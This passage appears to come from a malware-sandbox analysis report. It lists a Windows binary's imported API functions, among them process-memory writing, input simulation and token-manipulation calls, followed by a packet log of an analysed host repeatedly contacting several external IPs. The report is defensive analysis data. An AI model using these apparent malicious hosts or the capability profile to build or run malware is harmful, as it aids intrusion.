                                        COMCTL32.dllImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, ImageList_ReplaceIcon, ImageList_Create, InitCommonControlsEx, ImageList_Destroy
                                        MPR.dllWNetCancelConnection2W, WNetGetConnectionW, WNetAddConnection2W, WNetUseConnectionW
                                        WININET.dllInternetReadFile, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetConnectW, HttpOpenRequestW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetQueryOptionW, InternetQueryDataAvailable
                                        PSAPI.DLLEnumProcesses, GetModuleBaseNameW, GetProcessMemoryInfo, EnumProcessModules
                                        USERENV.dllCreateEnvironmentBlock, DestroyEnvironmentBlock, UnloadUserProfile, LoadUserProfileW
                                        KERNEL32.dllHeapAlloc, Sleep, GetCurrentThreadId, RaiseException, MulDiv, GetVersionExW, GetSystemInfo, InterlockedIncrement, InterlockedDecrement, WideCharToMultiByte, lstrcpyW, MultiByteToWideChar, lstrlenW, lstrcmpiW, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, FindClose, DeleteFileW, FindNextFileW, MoveFileW, CopyFileW, CreateDirectoryW, RemoveDirectoryW, GetProcessHeap, QueryPerformanceFrequency, FindResourceW, LoadResource, LockResource, SizeofResource, EnumResourceNamesW, OutputDebugStringW, GetLocalTime, CompareStringW, DeleteCriticalSection, EnterCriticalSection, LeaveCriticalSection, InitializeCriticalSectionAndSpinCount, GetStdHandle, CreatePipe, InterlockedExchange, TerminateThread, GetTempPathW, GetTempFileNameW, VirtualFree, FormatMessageW, GetExitCodeProcess, SetErrorMode, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, DeviceIoControl, SetFileAttributesW, GetShortPathNameW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetSystemDirectoryW, GetComputerNameW, GetWindowsDirectoryW, GetCurrentProcessId, GetCurrentThread, GetProcessIoCounters, CreateProcessW, SetPriorityClass, LoadLibraryW, VirtualAlloc, LoadLibraryExW, HeapFree, WaitForSingleObject, CreateThread, DuplicateHandle, GetLastError, CloseHandle, GetCurrentProcess, GetProcAddress, LoadLibraryA, FreeLibrary, GetModuleFileNameW, GetFullPathNameW, SetCurrentDirectoryW, IsDebuggerPresent, GetCurrentDirectoryW, ExitProcess, ExitThread, GetSystemTimeAsFileTime, ResumeThread, GetTimeFormatW, GetDateFormatW, GetCommandLineW, GetStartupInfoW, IsProcessorFeaturePresent, HeapSize, GetCPInfo, GetACP, GetOEMCP, IsValidCodePage, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, SetLastError, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetStringTypeW, HeapCreate, SetHandleCount, GetFileType, SetStdHandle, GetConsoleCP, GetConsoleMode, LCMapStringW, RtlUnwind, SetFilePointer, GetTimeZoneInformation, FreeEnvironmentStringsW, GetEnvironmentStringsW, GetTickCount, HeapReAlloc, WriteConsoleW, SetEndOfFile, SetSystemPowerState, SetEnvironmentVariableA
                                        USER32.dllGetCursorInfo, RegisterHotKey, ClientToScreen, GetKeyboardLayoutNameW, IsCharAlphaW, IsCharAlphaNumericW, IsCharLowerW, IsCharUpperW, GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, MonitorFromPoint, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DrawMenuBar, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, ReleaseCapture, SetCapture, WindowFromPoint, LoadImageW, CreateIconFromResourceEx, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, SetMenuDefaultItem, InsertMenuItemW, IsMenu, TrackPopupMenuEx, GetCursorPos, DeleteMenu, CheckMenuRadioItem, SetWindowPos, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, FindWindowW, SystemParametersInfoW, TranslateMessage, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowLongW, AttachThreadInput, GetFocus, GetWindowTextW, ScreenToClient, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetClassNameW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, GetWindowRect, SetUserObjectSecurity, GetUserObjectSecurity, CloseDesktop, CloseWindowStation, OpenDesktopW, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW, MessageBoxW, DefWindowProcW, CopyImage, AdjustWindowRectEx, SetRect, SetClipboardData, EmptyClipboard, CountClipboardFormats, CloseClipboard, GetClipboardData, IsClipboardFormatAvailable, OpenClipboard, BlockInput, GetMessageW, LockWindowUpdate, GetMenuItemID, DispatchMessageW, MoveWindow, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, PeekMessageW, UnregisterHotKey, CharLowerBuffW, keybd_event, MonitorFromRect, GetWindowThreadProcessId
                                        GDI32.dllDeleteObject, AngleArc, GetTextExtentPoint32W, ExtCreatePen, StrokeAndFillPath, StrokePath, EndPath, SetPixel, CloseFigure, CreateCompatibleBitmap, CreateCompatibleDC, SelectObject, StretchBlt, GetDIBits, GetDeviceCaps, MoveToEx, DeleteDC, GetPixel, CreateDCW, Ellipse, PolyDraw, BeginPath, Rectangle, SetViewportOrgEx, GetObjectW, SetBkMode, RoundRect, SetBkColor, CreatePen, CreateSolidBrush, SetTextColor, CreateFontW, GetTextFaceW, GetStockObject, LineTo
                                        COMDLG32.dllGetSaveFileNameW, GetOpenFileNameW
                                        ADVAPI32.dllRegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegEnumKeyExW, RegSetValueExW, RegCreateKeyExW, GetUserNameW, RegConnectRegistryW, CloseServiceHandle, UnlockServiceDatabase, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, InitializeSecurityDescriptor, InitializeAcl, GetLengthSid, CopySid, LogonUserW, LockServiceDatabase, GetTokenInformation, GetSecurityDescriptorDacl, GetAclInformation, GetAce, AddAce, SetSecurityDescriptorDacl, RegOpenKeyExW, RegQueryValueExW, AdjustTokenPrivileges, InitiateSystemShutdownExW, OpenSCManagerW, RegCloseKey
                                        SHELL32.dllDragQueryPoint, ShellExecuteExW, SHGetFolderPathW, DragQueryFileW, SHEmptyRecycleBinW, SHBrowseForFolderW, SHFileOperationW, SHGetPathFromIDListW, SHGetDesktopFolder, SHGetMalloc, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW, DragFinish
                                        ole32.dllOleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CLSIDFromString, StringFromGUID2, CoInitialize, CoUninitialize, CoCreateInstance, CreateStreamOnHGlobal, CoTaskMemAlloc, CoTaskMemFree, ProgIDFromCLSID, OleInitialize, CreateBindCtx, CLSIDFromProgID, CoInitializeSecurity, CoCreateInstanceEx, CoSetProxyBlanket, OleUninitialize, IIDFromString
                                        OLEAUT32.dllVariantChangeType, VariantCopyInd, DispCallFunc, CreateStdDispatch, CreateDispTypeInfo, SysFreeString, SafeArrayDestroyDescriptor, SafeArrayDestroyData, SafeArrayUnaccessData, SysStringLen, SafeArrayAllocData, GetActiveObject, QueryPathOfRegTypeLib, SafeArrayAllocDescriptorEx, SafeArrayCreateVector, SysAllocString, VariantCopy, VariantClear, VariantTimeToSystemTime, VarR8FromDec, SafeArrayGetVartype, OleLoadPicture, SafeArrayAccessData, VariantInit

                                        Possible Origin

                                        Language of compilation systemCountry where language is spokenMap
                                        EnglishGreat Britain
                                        EnglishUnited States

                                        Network Behavior

                                        Network Port Distribution

                                        TCP Packets

                                        TimestampSource PortDest PortSource IPDest IP
                                        Sep 27, 2024 06:34:54.678596020 CEST5495280192.168.2.7208.91.197.27
                                        Sep 27, 2024 06:34:54.683518887 CEST8054952208.91.197.27192.168.2.7
                                        Sep 27, 2024 06:34:54.683602095 CEST5495280192.168.2.7208.91.197.27
                                        Sep 27, 2024 06:34:54.691826105 CEST5495280192.168.2.7208.91.197.27
                                        Sep 27, 2024 06:34:54.696703911 CEST8054952208.91.197.27192.168.2.7
                                        Sep 27, 2024 06:34:55.683835030 CEST8054952208.91.197.27192.168.2.7
                                        Sep 27, 2024 06:34:55.683855057 CEST8054952208.91.197.27192.168.2.7
                                        Sep 27, 2024 06:34:55.683870077 CEST8054952208.91.197.27192.168.2.7
                                        Sep 27, 2024 06:34:55.684098959 CEST8054952208.91.197.27192.168.2.7
                                        Sep 27, 2024 06:34:55.684144020 CEST5495280192.168.2.7208.91.197.27
                                        Sep 27, 2024 06:34:55.684170961 CEST5495280192.168.2.7208.91.197.27
                                        Sep 27, 2024 06:34:55.684190989 CEST8054952208.91.197.27192.168.2.7
                                        Sep 27, 2024 06:34:55.684250116 CEST5495280192.168.2.7208.91.197.27
                                        Sep 27, 2024 06:34:55.696656942 CEST5495280192.168.2.7208.91.197.27
                                        Sep 27, 2024 06:34:55.701565981 CEST8054952208.91.197.27192.168.2.7
                                        Sep 27, 2024 06:35:15.880361080 CEST5495380192.168.2.738.180.87.102
                                        Sep 27, 2024 06:35:15.885274887 CEST805495338.180.87.102192.168.2.7
                                        Sep 27, 2024 06:35:15.885359049 CEST5495380192.168.2.738.180.87.102
                                        Sep 27, 2024 06:35:15.897653103 CEST5495380192.168.2.738.180.87.102
                                        Sep 27, 2024 06:35:15.902602911 CEST805495338.180.87.102192.168.2.7
                                        Sep 27, 2024 06:35:16.508824110 CEST805495338.180.87.102192.168.2.7
                                        Sep 27, 2024 06:35:16.508842945 CEST805495338.180.87.102192.168.2.7
                                        Sep 27, 2024 06:35:16.508933067 CEST5495380192.168.2.738.180.87.102
                                        Sep 27, 2024 06:35:17.405538082 CEST5495380192.168.2.738.180.87.102
                                        Sep 27, 2024 06:35:18.425544977 CEST5495480192.168.2.738.180.87.102
                                        Sep 27, 2024 06:35:18.430536985 CEST805495438.180.87.102192.168.2.7
                                        Sep 27, 2024 06:35:18.430670023 CEST5495480192.168.2.738.180.87.102
                                        Sep 27, 2024 06:35:18.448776960 CEST5495480192.168.2.738.180.87.102
                                        Sep 27, 2024 06:35:18.453668118 CEST805495438.180.87.102192.168.2.7
                                        Sep 27, 2024 06:35:19.045104027 CEST805495438.180.87.102192.168.2.7
                                        Sep 27, 2024 06:35:19.045126915 CEST805495438.180.87.102192.168.2.7
                                        Sep 27, 2024 06:35:19.045423985 CEST5495480192.168.2.738.180.87.102
                                        Sep 27, 2024 06:35:19.952358007 CEST5495480192.168.2.738.180.87.102
                                        Sep 27, 2024 06:35:20.971487999 CEST5495580192.168.2.738.180.87.102
                                        Sep 27, 2024 06:35:20.979198933 CEST805495538.180.87.102192.168.2.7
                                        Sep 27, 2024 06:35:20.979327917 CEST5495580192.168.2.738.180.87.102
                                        Sep 27, 2024 06:35:20.990653992 CEST5495580192.168.2.738.180.87.102
                                        Sep 27, 2024 06:35:20.999362946 CEST805495538.180.87.102192.168.2.7
                                        Sep 27, 2024 06:35:21.000423908 CEST805495538.180.87.102192.168.2.7
                                        Sep 27, 2024 06:35:21.592946053 CEST805495538.180.87.102192.168.2.7
                                        Sep 27, 2024 06:35:21.593079090 CEST805495538.180.87.102192.168.2.7
                                        Sep 27, 2024 06:35:21.593308926 CEST5495580192.168.2.738.180.87.102
                                        Sep 27, 2024 06:35:22.499413013 CEST5495580192.168.2.738.180.87.102
                                        Sep 27, 2024 06:35:23.519046068 CEST5495680192.168.2.738.180.87.102
                                        Sep 27, 2024 06:35:23.526169062 CEST805495638.180.87.102192.168.2.7
                                        Sep 27, 2024 06:35:23.526294947 CEST5495680192.168.2.738.180.87.102
                                        Sep 27, 2024 06:35:23.533736944 CEST5495680192.168.2.738.180.87.102
                                        Sep 27, 2024 06:35:23.540617943 CEST805495638.180.87.102192.168.2.7
                                        Sep 27, 2024 06:35:24.168652058 CEST805495638.180.87.102192.168.2.7
                                        Sep 27, 2024 06:35:24.175406933 CEST805495638.180.87.102192.168.2.7
                                        Sep 27, 2024 06:35:24.175621033 CEST5495680192.168.2.738.180.87.102
                                        Sep 27, 2024 06:35:24.176412106 CEST5495680192.168.2.738.180.87.102
                                        Sep 27, 2024 06:35:24.181154966 CEST805495638.180.87.102192.168.2.7
                                        Sep 27, 2024 06:35:29.822575092 CEST5495780192.168.2.743.154.104.247
                                        Sep 27, 2024 06:35:29.827600002 CEST805495743.154.104.247192.168.2.7
                                        Sep 27, 2024 06:35:29.827758074 CEST5495780192.168.2.743.154.104.247
                                        Sep 27, 2024 06:35:29.838633060 CEST5495780192.168.2.743.154.104.247
                                        Sep 27, 2024 06:35:29.843558073 CEST805495743.154.104.247192.168.2.7
                                        Sep 27, 2024 06:35:31.343064070 CEST5495780192.168.2.743.154.104.247
                                        Sep 27, 2024 06:35:31.391011000 CEST805495743.154.104.247192.168.2.7
                                        Sep 27, 2024 06:35:32.362214088 CEST5495880192.168.2.743.154.104.247
                                        Sep 27, 2024 06:35:32.367242098 CEST805495843.154.104.247192.168.2.7
                                        Sep 27, 2024 06:35:32.367332935 CEST5495880192.168.2.743.154.104.247
                                        Sep 27, 2024 06:35:32.379057884 CEST5495880192.168.2.743.154.104.247
                                        Sep 27, 2024 06:35:32.385006905 CEST805495843.154.104.247192.168.2.7
                                        Sep 27, 2024 06:35:33.890130997 CEST5495880192.168.2.743.154.104.247
                                        Sep 27, 2024 06:35:33.939106941 CEST805495843.154.104.247192.168.2.7
                                        Sep 27, 2024 06:35:34.908941031 CEST5495980192.168.2.743.154.104.247
                                        Sep 27, 2024 06:35:34.913888931 CEST805495943.154.104.247192.168.2.7
                                        Sep 27, 2024 06:35:34.913995028 CEST5495980192.168.2.743.154.104.247
                                        Sep 27, 2024 06:35:34.934557915 CEST5495980192.168.2.743.154.104.247
                                        Sep 27, 2024 06:35:34.939410925 CEST805495943.154.104.247192.168.2.7
                                        Sep 27, 2024 06:35:34.939529896 CEST805495943.154.104.247192.168.2.7
                                        Sep 27, 2024 06:35:36.462774992 CEST5495980192.168.2.743.154.104.247
                                        Sep 27, 2024 06:35:36.511037111 CEST805495943.154.104.247192.168.2.7
                                        Sep 27, 2024 06:35:37.471451998 CEST5496080192.168.2.743.154.104.247
                                        Sep 27, 2024 06:35:37.476341009 CEST805496043.154.104.247192.168.2.7
                                        Sep 27, 2024 06:35:37.476501942 CEST5496080192.168.2.743.154.104.247
                                        Sep 27, 2024 06:35:37.486563921 CEST5496080192.168.2.743.154.104.247
                                        Sep 27, 2024 06:35:37.494517088 CEST805496043.154.104.247192.168.2.7
                                        Sep 27, 2024 06:35:51.218204975 CEST805495743.154.104.247192.168.2.7
                                        Sep 27, 2024 06:35:51.218481064 CEST5495780192.168.2.743.154.104.247
                                        Sep 27, 2024 06:35:53.725658894 CEST805495843.154.104.247192.168.2.7
                                        Sep 27, 2024 06:35:53.725756884 CEST5495880192.168.2.743.154.104.247
                                        Sep 27, 2024 06:35:56.291906118 CEST805495943.154.104.247192.168.2.7
                                        Sep 27, 2024 06:35:56.291974068 CEST5495980192.168.2.743.154.104.247
                                        Sep 27, 2024 06:35:58.856642008 CEST805496043.154.104.247192.168.2.7
                                        Sep 27, 2024 06:35:58.860133886 CEST5496080192.168.2.743.154.104.247
                                        Sep 27, 2024 06:35:58.873687983 CEST5496080192.168.2.743.154.104.247
                                        Sep 27, 2024 06:35:58.878515959 CEST805496043.154.104.247192.168.2.7
                                        Sep 27, 2024 06:36:03.893845081 CEST5496180192.168.2.713.248.169.48
                                        Sep 27, 2024 06:36:03.898727894 CEST805496113.248.169.48192.168.2.7
                                        Sep 27, 2024 06:36:03.898869991 CEST5496180192.168.2.713.248.169.48
                                        Sep 27, 2024 06:36:03.912205935 CEST5496180192.168.2.713.248.169.48
                                        Sep 27, 2024 06:36:03.916992903 CEST805496113.248.169.48192.168.2.7
                                        Sep 27, 2024 06:36:04.385149956 CEST805496113.248.169.48192.168.2.7
                                        Sep 27, 2024 06:36:04.385468006 CEST5496180192.168.2.713.248.169.48
                                        Sep 27, 2024 06:36:05.421437979 CEST5496180192.168.2.713.248.169.48
                                        Sep 27, 2024 06:36:05.426341057 CEST805496113.248.169.48192.168.2.7
                                        Sep 27, 2024 06:36:06.440943003 CEST5496280192.168.2.713.248.169.48
                                        Sep 27, 2024 06:36:06.445914984 CEST805496213.248.169.48192.168.2.7
                                        Sep 27, 2024 06:36:06.446050882 CEST5496280192.168.2.713.248.169.48
                                        Sep 27, 2024 06:36:06.460464954 CEST5496280192.168.2.713.248.169.48
                                        Sep 27, 2024 06:36:06.465367079 CEST805496213.248.169.48192.168.2.7
                                        Sep 27, 2024 06:36:06.916492939 CEST805496213.248.169.48192.168.2.7
                                        Sep 27, 2024 06:36:06.916562080 CEST5496280192.168.2.713.248.169.48
                                        Sep 27, 2024 06:36:07.968156099 CEST5496280192.168.2.713.248.169.48
                                        Sep 27, 2024 06:36:07.972954035 CEST805496213.248.169.48192.168.2.7
                                        Sep 27, 2024 06:36:08.987880945 CEST5496380192.168.2.713.248.169.48
                                        Sep 27, 2024 06:36:08.992764950 CEST805496313.248.169.48192.168.2.7
                                        Sep 27, 2024 06:36:08.992856979 CEST5496380192.168.2.713.248.169.48
                                        Sep 27, 2024 06:36:09.004013062 CEST5496380192.168.2.713.248.169.48
                                        Sep 27, 2024 06:36:09.009298086 CEST805496313.248.169.48192.168.2.7
                                        Sep 27, 2024 06:36:09.009308100 CEST805496313.248.169.48192.168.2.7
                                        Sep 27, 2024 06:36:09.471436024 CEST805496313.248.169.48192.168.2.7
                                        Sep 27, 2024 06:36:09.471548080 CEST5496380192.168.2.713.248.169.48
                                        Sep 27, 2024 06:36:10.530081987 CEST5496380192.168.2.713.248.169.48
                                        Sep 27, 2024 06:36:10.534923077 CEST805496313.248.169.48192.168.2.7
                                        Sep 27, 2024 06:36:11.536587954 CEST5496480192.168.2.713.248.169.48
                                        Sep 27, 2024 06:36:11.541548967 CEST805496413.248.169.48192.168.2.7
                                        Sep 27, 2024 06:36:11.541651011 CEST5496480192.168.2.713.248.169.48
                                        Sep 27, 2024 06:36:11.549455881 CEST5496480192.168.2.713.248.169.48
                                        Sep 27, 2024 06:36:11.554255009 CEST805496413.248.169.48192.168.2.7
                                        Sep 27, 2024 06:36:12.006295919 CEST805496413.248.169.48192.168.2.7
                                        Sep 27, 2024 06:36:12.006316900 CEST805496413.248.169.48192.168.2.7
                                        Sep 27, 2024 06:36:12.006460905 CEST5496480192.168.2.713.248.169.48
                                        Sep 27, 2024 06:36:12.009444952 CEST5496480192.168.2.713.248.169.48
                                        Sep 27, 2024 06:36:12.014219999 CEST805496413.248.169.48192.168.2.7
                                        Sep 27, 2024 06:36:17.039906979 CEST5496580192.168.2.73.33.130.190
                                        Sep 27, 2024 06:36:17.044791937 CEST80549653.33.130.190192.168.2.7
                                        Sep 27, 2024 06:36:17.044905901 CEST5496580192.168.2.73.33.130.190
                                        Sep 27, 2024 06:36:17.057209015 CEST5496580192.168.2.73.33.130.190
                                        Sep 27, 2024 06:36:17.062124014 CEST80549653.33.130.190192.168.2.7
                                        Sep 27, 2024 06:36:17.524646044 CEST80549653.33.130.190192.168.2.7
                                        Sep 27, 2024 06:36:17.524713039 CEST5496580192.168.2.73.33.130.190
                                        Sep 27, 2024 06:36:18.562042952 CEST5496580192.168.2.73.33.130.190
                                        Sep 27, 2024 06:36:18.566907883 CEST80549653.33.130.190192.168.2.7
                                        Sep 27, 2024 06:36:19.581072092 CEST5496680192.168.2.73.33.130.190
                                        Sep 27, 2024 06:36:19.586105108 CEST80549663.33.130.190192.168.2.7
                                        Sep 27, 2024 06:36:19.586179972 CEST5496680192.168.2.73.33.130.190
                                        Sep 27, 2024 06:36:19.599750042 CEST5496680192.168.2.73.33.130.190
                                        Sep 27, 2024 06:36:19.604568005 CEST80549663.33.130.190192.168.2.7
                                        Sep 27, 2024 06:36:20.060712099 CEST80549663.33.130.190192.168.2.7
                                        Sep 27, 2024 06:36:20.061801910 CEST5496680192.168.2.73.33.130.190
                                        Sep 27, 2024 06:36:21.108913898 CEST5496680192.168.2.73.33.130.190
                                        Sep 27, 2024 06:36:21.113830090 CEST80549663.33.130.190192.168.2.7
                                        Sep 27, 2024 06:36:22.136323929 CEST5496780192.168.2.73.33.130.190
                                        Sep 27, 2024 06:36:22.152652979 CEST80549673.33.130.190192.168.2.7
                                        Sep 27, 2024 06:36:22.152796030 CEST5496780192.168.2.73.33.130.190
                                        Sep 27, 2024 06:36:22.174774885 CEST5496780192.168.2.73.33.130.190
                                        Sep 27, 2024 06:36:22.179764032 CEST80549673.33.130.190192.168.2.7
                                        Sep 27, 2024 06:36:22.181905031 CEST80549673.33.130.190192.168.2.7
                                        Sep 27, 2024 06:36:22.608810902 CEST80549673.33.130.190192.168.2.7
                                        Sep 27, 2024 06:36:22.609006882 CEST5496780192.168.2.73.33.130.190
                                        Sep 27, 2024 06:36:23.693701029 CEST5496780192.168.2.73.33.130.190
                                        Sep 27, 2024 06:36:23.698673010 CEST80549673.33.130.190192.168.2.7
                                        Sep 27, 2024 06:36:24.711456060 CEST5496880192.168.2.73.33.130.190
                                        Sep 27, 2024 06:36:24.716401100 CEST80549683.33.130.190192.168.2.7
                                        Sep 27, 2024 06:36:24.716484070 CEST5496880192.168.2.73.33.130.190
                                        Sep 27, 2024 06:36:24.737642050 CEST5496880192.168.2.73.33.130.190
                                        Sep 27, 2024 06:36:24.742477894 CEST80549683.33.130.190192.168.2.7
                                        Sep 27, 2024 06:36:25.188066959 CEST80549683.33.130.190192.168.2.7
                                        Sep 27, 2024 06:36:25.188160896 CEST80549683.33.130.190192.168.2.7
                                        Sep 27, 2024 06:36:25.188257933 CEST5496880192.168.2.73.33.130.190
                                        Sep 27, 2024 06:36:25.247760057 CEST5496880192.168.2.73.33.130.190
                                        Sep 27, 2024 06:36:25.252615929 CEST80549683.33.130.190192.168.2.7
                                        Sep 27, 2024 06:36:30.272088051 CEST5496980192.168.2.73.33.130.190
                                        Sep 27, 2024 06:36:30.277009010 CEST80549693.33.130.190192.168.2.7
                                        Sep 27, 2024 06:36:30.277821064 CEST5496980192.168.2.73.33.130.190
                                        Sep 27, 2024 06:36:30.289741993 CEST5496980192.168.2.73.33.130.190
                                        Sep 27, 2024 06:36:30.294632912 CEST80549693.33.130.190192.168.2.7
                                        Sep 27, 2024 06:36:31.796447039 CEST5496980192.168.2.73.33.130.190
                                        Sep 27, 2024 06:36:31.801881075 CEST80549693.33.130.190192.168.2.7
                                        Sep 27, 2024 06:36:31.805831909 CEST5496980192.168.2.73.33.130.190
                                        Sep 27, 2024 06:36:32.817729950 CEST5497080192.168.2.73.33.130.190
                                        Sep 27, 2024 06:36:32.822532892 CEST80549703.33.130.190192.168.2.7
                                        Sep 27, 2024 06:36:32.822652102 CEST5497080192.168.2.73.33.130.190
                                        Sep 27, 2024 06:36:32.842016935 CEST5497080192.168.2.73.33.130.190
                                        Sep 27, 2024 06:36:32.846748114 CEST80549703.33.130.190192.168.2.7
                                        Sep 27, 2024 06:36:33.286336899 CEST80549703.33.130.190192.168.2.7
                                        Sep 27, 2024 06:36:33.286391020 CEST5497080192.168.2.73.33.130.190
                                        Sep 27, 2024 06:36:34.359270096 CEST5497080192.168.2.73.33.130.190
                                        Sep 27, 2024 06:36:34.364515066 CEST80549703.33.130.190192.168.2.7
                                        Sep 27, 2024 06:36:35.378650904 CEST5497180192.168.2.73.33.130.190
                                        Sep 27, 2024 06:36:35.383491039 CEST80549713.33.130.190192.168.2.7
                                        Sep 27, 2024 06:36:35.383586884 CEST5497180192.168.2.73.33.130.190
                                        Sep 27, 2024 06:36:35.396697998 CEST5497180192.168.2.73.33.130.190
                                        Sep 27, 2024 06:36:35.401645899 CEST80549713.33.130.190192.168.2.7
                                        Sep 27, 2024 06:36:35.401813030 CEST80549713.33.130.190192.168.2.7
                                        Sep 27, 2024 06:36:35.841047049 CEST80549713.33.130.190192.168.2.7
                                        Sep 27, 2024 06:36:35.841118097 CEST5497180192.168.2.73.33.130.190
                                        Sep 27, 2024 06:36:36.906980991 CEST5497180192.168.2.73.33.130.190
                                        Sep 27, 2024 06:36:36.911834955 CEST80549713.33.130.190192.168.2.7
                                        Sep 27, 2024 06:36:37.955050945 CEST5497280192.168.2.73.33.130.190
                                        Sep 27, 2024 06:36:37.959794998 CEST80549723.33.130.190192.168.2.7
                                        Sep 27, 2024 06:36:37.961796045 CEST5497280192.168.2.73.33.130.190
                                        Sep 27, 2024 06:36:37.969007015 CEST5497280192.168.2.73.33.130.190
                                        Sep 27, 2024 06:36:37.973969936 CEST80549723.33.130.190192.168.2.7
                                        Sep 27, 2024 06:36:38.438513041 CEST80549723.33.130.190192.168.2.7
                                        Sep 27, 2024 06:36:38.438674927 CEST80549723.33.130.190192.168.2.7
                                        Sep 27, 2024 06:36:38.438935995 CEST5497280192.168.2.73.33.130.190
                                        Sep 27, 2024 06:36:38.441523075 CEST5497280192.168.2.73.33.130.190
                                        Sep 27, 2024 06:36:38.446304083 CEST80549723.33.130.190192.168.2.7
                                        Sep 27, 2024 06:36:43.483994007 CEST5497380192.168.2.7162.0.238.238
                                        Sep 27, 2024 06:36:43.488737106 CEST8054973162.0.238.238192.168.2.7
                                        Sep 27, 2024 06:36:43.489972115 CEST5497380192.168.2.7162.0.238.238
                                        Sep 27, 2024 06:36:43.500741959 CEST5497380192.168.2.7162.0.238.238
                                        Sep 27, 2024 06:36:43.505561113 CEST8054973162.0.238.238192.168.2.7
                                        Sep 27, 2024 06:36:44.078306913 CEST8054973162.0.238.238192.168.2.7
                                        Sep 27, 2024 06:36:44.078377008 CEST8054973162.0.238.238192.168.2.7
                                        Sep 27, 2024 06:36:44.078424931 CEST5497380192.168.2.7162.0.238.238
                                        Sep 27, 2024 06:36:45.017751932 CEST5497380192.168.2.7162.0.238.238
                                        Sep 27, 2024 06:36:46.034519911 CEST5497480192.168.2.7162.0.238.238
                                        Sep 27, 2024 06:36:46.039288044 CEST8054974162.0.238.238192.168.2.7
                                        Sep 27, 2024 06:36:46.039359093 CEST5497480192.168.2.7162.0.238.238
                                        Sep 27, 2024 06:36:46.054124117 CEST5497480192.168.2.7162.0.238.238
                                        Sep 27, 2024 06:36:46.058885098 CEST8054974162.0.238.238192.168.2.7
                                        Sep 27, 2024 06:36:46.661902905 CEST8054974162.0.238.238192.168.2.7
                                        Sep 27, 2024 06:36:46.662081957 CEST8054974162.0.238.238192.168.2.7
                                        Sep 27, 2024 06:36:46.662271023 CEST5497480192.168.2.7162.0.238.238
                                        Sep 27, 2024 06:36:47.565767050 CEST5497480192.168.2.7162.0.238.238
                                        Sep 27, 2024 06:36:48.912147999 CEST5497580192.168.2.7162.0.238.238
                                        Sep 27, 2024 06:36:48.917134047 CEST8054975162.0.238.238192.168.2.7
                                        Sep 27, 2024 06:36:48.917221069 CEST5497580192.168.2.7162.0.238.238
                                        Sep 27, 2024 06:36:48.929270029 CEST5497580192.168.2.7162.0.238.238
                                        Sep 27, 2024 06:36:48.934232950 CEST8054975162.0.238.238192.168.2.7
                                        Sep 27, 2024 06:36:48.934242964 CEST8054975162.0.238.238192.168.2.7
                                        Sep 27, 2024 06:36:49.533869028 CEST8054975162.0.238.238192.168.2.7
                                        Sep 27, 2024 06:36:49.533998966 CEST8054975162.0.238.238192.168.2.7
                                        Sep 27, 2024 06:36:49.534054041 CEST5497580192.168.2.7162.0.238.238
                                        Sep 27, 2024 06:36:50.437227964 CEST5497580192.168.2.7162.0.238.238
                                        Sep 27, 2024 06:36:51.456443071 CEST5497680192.168.2.7162.0.238.238
                                        Sep 27, 2024 06:36:51.463252068 CEST8054976162.0.238.238192.168.2.7
                                        Sep 27, 2024 06:36:51.465847015 CEST5497680192.168.2.7162.0.238.238
                                        Sep 27, 2024 06:36:51.473756075 CEST5497680192.168.2.7162.0.238.238
                                        Sep 27, 2024 06:36:51.478632927 CEST8054976162.0.238.238192.168.2.7
